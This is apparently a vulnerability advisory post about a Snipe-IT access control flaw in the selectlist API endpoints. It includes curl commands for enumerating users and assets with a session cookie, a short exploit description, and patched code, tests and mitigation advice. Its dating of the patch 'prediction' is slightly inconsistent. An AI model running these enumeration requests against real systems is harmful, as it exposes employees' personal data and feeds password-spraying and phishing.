Listen to this Post
The vulnerability exists due to improper access control in the `GET /api/v1/{object}/selectlist` API endpoint when handling authenticated requests. This endpoint is used across multiple object types—including accessories, assets, consumables, licenses, and users—to return paginated lists for dropdown/select UI components.
Under normal operation, the endpoint should enforce the `view.selectlists` permission before returning any data. However, in vulnerable versions, this authorization check is completely absent. Any user who can log into Snipe-IT—regardless of their assigned permissions—can call this endpoint using only their web session cookie. No API token, elevated privileges, or special roles are required.
When an authenticated attacker sends a GET request to `/api/v1/users/selectlist` (or any other object’s selectlist endpoint), the application processes the request and returns a paginated JSON response containing sensitive user fields: id, `name` (display name), username, and employee_number. The search parameter can be used to refine or enumerate results, effectively enabling indirect email enumeration via username patterns.
The exposure scope depends on the Full Multiple Company Support (FMCS) setting. If FMCS is disabled, the endpoint returns every active user account in the entire system. If FMCS is enabled, the exposure is limited to accounts within the same company as the authenticated attacker.
An attacker with only a valid login and zero permissions can:
– Enumerate all active user accounts by paginating through the endpoint
– Harvest usernames for credential stuffing or password spray attacks
– Collect employee numbers and full names for social engineering
– Perform indirect email enumeration via the search parameter
– Map user IDs for use in further enumeration against other endpoints
The vulnerability is exploitable only by users who have a working login to the Snipe-IT system. The fix, committed as grokability/snipe-it@4f943d4, adds a `$this->authorize(‘view.selectlists’)` check to the `selectlist()` method in each relevant controller (Accessory, Asset, Consumable, License, User), ensuring that only users with the proper permission can access the endpoint.
DailyCVE Form:
Platform: ...... Snipe-IT Version: ........ before 8.1.0 (vulnerable); fixed in 8.1.0+ Vulnerability :.. Improper Access Control (CWE-284) Severity: ....... Low (CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N) date: ........... June 9, 2026 Prediction: ...... Patch expected June 8, 2026 (commit 4f943d4)
What Undercode Say
Enumerate all users (paginated) - vulnerable endpoint curl -X GET "https://snipe-it.example.com/api/v1/users/selectlist?limit=50&page=1" \ -H "Cookie: snipeit_session=YOUR_SESSION_COOKIE" Enumerate accessories curl -X GET "https://snipe-it.example.com/api/v1/accessories/selectlist?limit=100" \ -H "Cookie: snipeit_session=YOUR_SESSION_COOKIE" Enumerate assets with search filter curl -X GET "https://snipe-it.example.com/api/v1/assets/selectlist?search=admin" \ -H "Cookie: snipeit_session=YOUR_SESSION_COOKIE" Enumerate consumables curl -X GET "https://snipe-it.example.com/api/v1/consumables/selectlist" \ -H "Cookie: snipeit_session=YOUR_SESSION_COOKIE" Enumerate licenses curl -X GET "https://snipe-it.example.com/api/v1/licenses/selectlist" \ -H "Cookie: snipeit_session=YOUR_SESSION_COOKIE"
Example vulnerable controller code (before patch):
public function selectlist(Request $request)
{
// No authorization check - directly returns data
$users = User::select(['users.id', 'users.name', 'users.username', 'users.employee_num']);
// ... pagination logic
return response()->json($users);
}
Patched controller code (after 4f943d4):
public function selectlist(Request $request)
{
$this->authorize('view.selectlists'); // <-- Added gate check
$users = User::select(['users.id', 'users.name', 'users.username', 'users.employee_num']);
// ... pagination logic
return response()->json($users);
}
Test case added to verify fix:
public function test_requires_view_selectlists_permission(): void
{
$this->actingAsForApi(User::factory()->create())
->getJson(route('api.accessories.selectlist'))
->assertForbidden(); // 403 Forbidden for users without permission
}
Exploit
To exploit this vulnerability, an attacker needs:
- A valid Snipe-IT user account (any privilege level)
- The web session cookie from a successful login
The attacker then sends authenticated GET requests to any of the following endpoints:
– `/api/v1/users/selectlist`
– `/api/v1/accessories/selectlist`
– `/api/v1/assets/selectlist`
– `/api/v1/consumables/selectlist`
– `/api/v1/licenses/selectlist`
The response returns a paginated JSON list containing sensitive fields. By iterating through pages and using the `search` parameter, the attacker can systematically enumerate all active user accounts, harvesting usernames, display names, employee numbers, and user IDs. No API token or special permissions are required—only the session cookie.
Protection
- Upgrade to Snipe-IT version 8.1.0 or later, which includes the patch from commit `4f943d4`
– Apply the patch manually if upgrading is not immediately possible: add `$this->authorize(‘view.selectlists’);` to the `selectlist()` method in each of the following controllers:
– `app/Http/Controllers/Api/AccessoriesController.php`
– `app/Http/Controllers/Api/AssetsController.php`
– `app/Http/Controllers/Api/ConsumablesController.php`
– `app/Http/Controllers/Api/LicensesController.php`
– `app/Http/Controllers/Api/UsersController.php`
– Review user permissions and ensure that the `view.selectlists` permission is only granted to roles that genuinely require it - Monitor logs for unusual patterns of requests to the `/api/v1//selectlist` endpoints, especially from low-privilege users
- Implement network-level restrictions if possible, limiting API access to trusted IP ranges
Impact
- Information Disclosure: Exposes usernames, display names, employee numbers, and user IDs of all active accounts (or within the same company if FMCS is enabled)
- Credential Stuffing: Harvested usernames can be used in automated password spraying attacks against the Snipe-IT login portal or other services where users reuse credentials
- Social Engineering: Full names and employee numbers provide attackers with convincing pretexts for phishing or vishing campaigns
- Account Enumeration: The search parameter allows attackers to confirm the existence of specific users, enabling targeted attacks
- Further Exploitation: Mapped user IDs can be used to probe other API endpoints (e.g.,
/api/v1/users/{id}) for additional information or vulnerabilities - Compliance Violations: Exposure of employee numbers and personal identifiable information may violate GDPR, HIPAA, or other data protection regulations
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
